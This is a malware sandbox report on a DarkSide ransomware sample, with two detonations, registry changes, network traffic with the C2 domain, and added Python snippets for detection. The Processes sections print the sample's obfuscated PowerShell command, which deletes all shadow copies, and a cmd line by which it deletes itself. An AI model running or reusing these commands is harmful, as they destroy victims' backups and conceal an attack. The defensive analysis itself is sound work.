Analysis Overview
SHA256
1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb
Threat Level: Known bad
The file 1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Deletes itself
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Control Panel
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Analysis: static1
Detonation Overview
Reported
2021-05-17 12:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-05-17 12:21
Reported
2021-05-17 12:24
Platform
win7v20210408
Max time kernel
66s
Max time network
111s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f2cbf9aa.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f2cbf9aa.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f2cbf9aa.ico" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
"C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\1CC7C1~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 8.8.8.8:53 | 1.0.7.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
Files
memory/1988-59-0x0000000075AD1000-0x0000000075AD3000-memory.dmp
memory/980-60-0x0000000000000000-mapping.dmp
memory/980-61-0x000007FEFB761000-0x000007FEFB763000-memory.dmp
memory/980-62-0x0000000002640000-0x0000000002641000-memory.dmp
memory/980-63-0x000000001AB70000-0x000000001AB71000-memory.dmp
memory/980-64-0x0000000002680000-0x0000000002681000-memory.dmp
memory/980-65-0x00000000023E0000-0x00000000023E1000-memory.dmp
memory/980-66-0x0000000002360000-0x0000000002362000-memory.dmp
memory/980-67-0x0000000002364000-0x0000000002366000-memory.dmp
memory/980-68-0x000000001C660000-0x000000001C661000-memory.dmp
memory/980-69-0x000000001B5E0000-0x000000001B5E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | d0353d314c5bc8c1ea82212d0215fa51 |
| SHA1 | 6df2b40f6092434fdf2a54fe34a4ec110e12a6c1 |
| SHA256 | a6c8a1c4d18e494c5f4b9dbf4d07ea122a691566d7e0ff04cf8a63e2db4fa916 |
| SHA512 | 27c8fa70682cfbf60895bd5914a2476fee2794212914b893124012514935944022221cae64d118869969f393d277103f6ef1fa41ed009dea590c8eb9318ef923 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 964e4d4e28734b6461fd42c2774c2c62 |
| SHA1 | 1c981ea3ce8a1b76f82cfcfc7578977639c26bb5 |
| SHA256 | 8acb6f1a2c83eb22bf9cf2b139ba7ad35b2aa7e95268e7395596d98b44f14171 |
| SHA512 | 191ee02a54d90e9d4834f19a91ee5190aea32d04f21880c5767658c8faa1a5b5b12b8c585a86759a50a7178844fb15e4ac88ed9b01561667b155272d7fc82252 |
memory/2736-72-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-05-17 12:21
Reported
2021-05-17 12:23
Platform
win10v20210410
Max time kernel
69s
Max time network
125s
Command Line
Signatures
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b336f65.BMP" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65 | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b336f65.ico" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65 | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65\ = "7b336f65" | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
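In both detonations the sample uses a single 8-hex-character token (f2cbf9aa on win7, 7b336f65 on win10) for three things at once: the new file extension registered under HKLM\SOFTWARE\Classes, the DefaultIcon of the matching ProgID, and the name of the ransom wallpaper BMP dropped in C:\ProgramData. The Python below is an added example, not part of this report or of the sample: it rebuilds the registry rows from the two tables, groups them per process, and alerts only when the extension token and the wallpaper file name agree, so a user merely changing wallpaper or an installer registering a file type does not fire. The benign rows, the function names and the tuple shape are constructed for the example.

```python
import ntpath
import re
from collections import defaultdict

SAMPLE_EXE = "1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe"

# Extension key created under HKLM\SOFTWARE\Classes: ".<8 hex chars>" at the end of the path
EXT_KEY = re.compile(r"\\Classes\\\.([0-9a-f]{8})$", re.I)
# DefaultIcon subkey of the matching ProgID, with or without a trailing backslash
ICON_KEY = re.compile(r"\\Classes\\[0-9a-f]{8}\\DefaultIcon\\?$", re.I)


def reported_rows(sid, token):
    """The eight registry rows both detonations produced; only the user SID and the
    8-hex token differ between behavioral1 (f2cbf9aa) and behavioral2 (7b336f65).
    Tuple shape (constructed for this example): (operation, key, value, process)."""
    desk = "\\REGISTRY\\USER\\" + sid + "\\Control Panel\\Desktop\\"
    cls = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\"
    bmp = "C:\\ProgramData\\" + token + ".BMP"
    ico = "C:\\Users\\Admin\\AppData\\Local\\" + token + ".ico"
    return [
        ("Set value", desk + "WallPaper", bmp, SAMPLE_EXE),
        ("Set value", desk + "Wallpaper", bmp, SAMPLE_EXE),
        ("Set value", desk + "WallpaperStyle", "10", SAMPLE_EXE),
        ("Key created", cls + token, "", SAMPLE_EXE),
        ("Set value", cls + token + "\\DefaultIcon\\", ico, SAMPLE_EXE),
        ("Key created", cls + "." + token, "", SAMPLE_EXE),
        ("Set value", cls + "." + token + "\\", token, SAMPLE_EXE),
        ("Key created", cls + token + "\\DefaultIcon", "", SAMPLE_EXE),
    ]


BEHAVIORAL1 = reported_rows("S-1-5-21-2455352368-1077083310-2879168483-1000", "f2cbf9aa")
BEHAVIORAL2 = reported_rows("S-1-5-21-3686645723-710336880-414668232-1000", "7b336f65")

# Constructed benign activity (not from the report): a user picking a BMP wallpaper and an
# installer registering a file type. Neither should trip the correlation.
BENIGN_ROWS = [
    ("Set value", "\\REGISTRY\\USER\\S-1-5-21-1-2-3-1000\\Control Panel\\Desktop\\Wallpaper",
     "C:\\Users\\Admin\\Pictures\\beach.bmp", "explorer.exe"),
    ("Key created", "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\.myapp", "", "setup.exe"),
]


def extract_ransom_artifacts(events):
    """Per process, collect the token-bearing artifacts: new extension, wallpaper, icon."""
    per_proc = defaultdict(dict)
    for op, key, value, proc in events:
        ext = EXT_KEY.search(key)
        if op == "Key created" and ext:
            per_proc[proc]["extension"] = "." + ext.group(1).lower()
        elif key.lower().endswith("\\control panel\\desktop\\wallpaper") and value.lower().endswith(".bmp"):
            per_proc[proc]["wallpaper"] = value
        elif ICON_KEY.search(key) and value.lower().endswith(".ico"):
            per_proc[proc]["icon"] = value
    return dict(per_proc)


def alerts(events):
    """Fire only when one process both registers a fresh 8-hex extension and sets a
    wallpaper whose file name carries the same token."""
    hits = []
    for proc, art in extract_ransom_artifacts(events).items():
        ext, wallpaper = art.get("extension"), art.get("wallpaper")
        if not (ext and wallpaper):
            continue
        stem = ntpath.splitext(ntpath.basename(wallpaper))[0].lower()
        if stem == ext[1:]:
            hits.append((proc, ext))
    return hits


if __name__ == "__main__":
    for name, rows in (("behavioral1", BEHAVIORAL1), ("behavioral2", BEHAVIORAL2), ("benign", BENIGN_ROWS)):
        print(name, alerts(rows), extract_ransom_artifacts(rows))
```

The same logic maps directly onto Sysmon Event ID 12 (key created) and 13 (value set) records; the join key is the process, and the token match is what turns two individually noisy signals (wallpaper change, new file association) into a high-confidence ransomware indicator.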
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3984 wrote to memory of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3984 wrote to memory of 4700 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3984 wrote to memory of 4700 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3984 wrote to memory of 4700 | N/A | C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
"C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\1CC7C1~1.EXE >> NUL
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | securebestapp20.com | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 8.8.8.8:53 | 12.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 11.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 1.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 13.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 15.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 19.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 22.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 21.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 26.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 25.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 28.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 32.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 31.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 35.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.15:5355 | N/A | udp |
| N/A | 10.10.0.28:5355 | N/A | udp |
| N/A | 10.10.0.12:5355 | N/A | udp |
| N/A | 10.10.0.26:5355 | N/A | udp |
| N/A | 8.8.8.8:53 | 37.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.31:5355 | N/A | udp |
| N/A | 10.10.0.21:5355 | N/A | udp |
| N/A | 10.10.0.22:5355 | N/A | udp |
| N/A | 8.8.8.8:53 | 38.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.37:5355 | N/A | udp |
| N/A | 8.8.8.8:53 | 39.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 41.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 16.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.19:5355 | N/A | udp |
| N/A | 10.10.0.32:5355 | N/A | udp |
| N/A | 10.10.0.16:5355 | N/A | udp |
| N/A | 10.10.0.39:5355 | N/A | udp |
| N/A | 10.10.0.11:5355 | N/A | udp |
| N/A | 10.10.0.13:5355 | N/A | udp |
| N/A | 10.10.0.38:5355 | N/A | udp |
| N/A | 10.10.0.35:5355 | N/A | udp |
| N/A | 10.10.0.41:5355 | N/A | udp |
| N/A | 8.8.8.8:53 | 18.0.10.10.in-addr.arpa | udp |
| N/A | 8.8.8.8:53 | 17.0.10.10.in-addr.arpa | udp |
| N/A | 10.10.0.18:5355 | N/A | udp |
| N/A | 10.10.0.17:5355 | N/A | udp |
| N/A | 185.105.109.19:443 | securebestapp20.com | tcp |
| N/A | 162.159.134.233:443 | N/A | tcp |
| N/A | 104.21.62.88:443 | N/A | tcp |
| N/A | 104.21.8.36:80 | N/A | tcp |
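Three shapes of traffic are mixed together in the table above: forward lookups and a TLS connection to securebestapp20.com, a run of PTR queries (x.0.10.10.in-addr.arpa) for hosts on the sandbox's 10.10.0.0/24 segment, and LLMNR probes (UDP 5355) to those same hosts, which is the sample resolving its neighbours. The Python below is an added example, not part of this report or of the sample: it takes a subset of the rows, recognises the reverse-lookup sweep by counting distinct hosts per /24, counts the LLMNR probes, and separates the public TCP egress. The threshold, the output keys and the row subset are constructed for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Subset of the behavioral2 network rows, as (destination, domain, proto); the full
# table repeats the same three shapes for more 10.10.0.x hosts.
NETWORK_ROWS = [
    ("8.8.8.8:53", "securebestapp20.com", "udp"),
    ("185.105.109.19:443", "securebestapp20.com", "tcp"),
    ("8.8.8.8:53", "12.0.10.10.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "11.0.10.10.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "1.0.10.10.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "13.0.10.10.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "15.0.10.10.in-addr.arpa", "udp"),
    ("10.10.0.15:5355", "", "udp"),
    ("10.10.0.28:5355", "", "udp"),
    ("10.10.0.12:5355", "", "udp"),
    ("162.159.134.233:443", "", "tcp"),
    ("104.21.8.36:80", "", "tcp"),
]

PTR_NAME = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa$", re.I)


def ptr_target(domain):
    """'12.0.10.10.in-addr.arpa' -> IPv4Address('10.10.0.12'); None for anything else."""
    m = PTR_NAME.match(domain or "")
    return ipaddress.ip_address(".".join(reversed(m.groups()))) if m else None


def summarise(rows, sweep_threshold=5):
    """Split the rows into reverse-DNS sweeps, LLMNR probes, forward lookups and egress."""
    ptr_by_net = defaultdict(set)   # /24 -> hosts the sample reverse-resolved
    llmnr_targets = set()           # UDP 5355 name probes on the local segment
    lookups = set()                 # forward DNS names
    egress = []                     # TCP to non-private hosts: (domain or None, ip, port)
    for dest, domain, proto in rows:
        host, port = dest.rsplit(":", 1)
        ip, port = ipaddress.ip_address(host), int(port)
        target = ptr_target(domain)
        if target is not None:
            ptr_by_net[ipaddress.ip_network(f"{target}/24", strict=False)].add(target)
        elif port == 53 and domain:
            lookups.add(domain)
        elif port == 5355 and proto == "udp":
            llmnr_targets.add(ip)
        elif proto == "tcp" and not ip.is_private:
            egress.append((domain or None, host, port))
    sweeps = {str(n): len(h) for n, h in ptr_by_net.items() if len(h) >= sweep_threshold}
    return {"sweeps": sweeps, "llmnr_probes": len(llmnr_targets),
            "dns_lookups": lookups, "egress": egress}


if __name__ == "__main__":
    print(summarise(NETWORK_ROWS))
```

On the full table the sweep count is much higher than on this subset, which is the point of thresholding on distinct hosts per /24 rather than on raw query volume: a single workstation reverse-resolving a couple of neighbours is normal, a process walking a whole subnet in seconds is not.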
Files
memory/2104-114-0x0000000000000000-mapping.dmp
memory/2104-119-0x00000250A8A70000-0x00000250A8A71000-memory.dmp
memory/2104-123-0x00000250A96D0000-0x00000250A96D1000-memory.dmp
memory/2104-126-0x00000250A8AA0000-0x00000250A8AA2000-memory.dmp
memory/2104-128-0x00000250A8AA3000-0x00000250A8AA5000-memory.dmp
memory/2104-130-0x00000250A8AA6000-0x00000250A8AA8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 32937604dd0791bffd969385d5817eaf |
| SHA1 | 32692f2d388e497edea6b17ef6471afcd7a9e1a8 |
| SHA256 | 292ee5fee35eadf7a2fa9ed81e3e34540a7d58c733e0063af5106749f67c76cd |
| SHA512 | 948e1c29929d526157f3a71d345ddec16d94b6245924198a184f866d61f9af93d314903ad1cdca5277a060118e52eee630c99f8a8f501f2c03699ecea780214f |
memory/4700-142-0x0000000000000000-mapping.dmp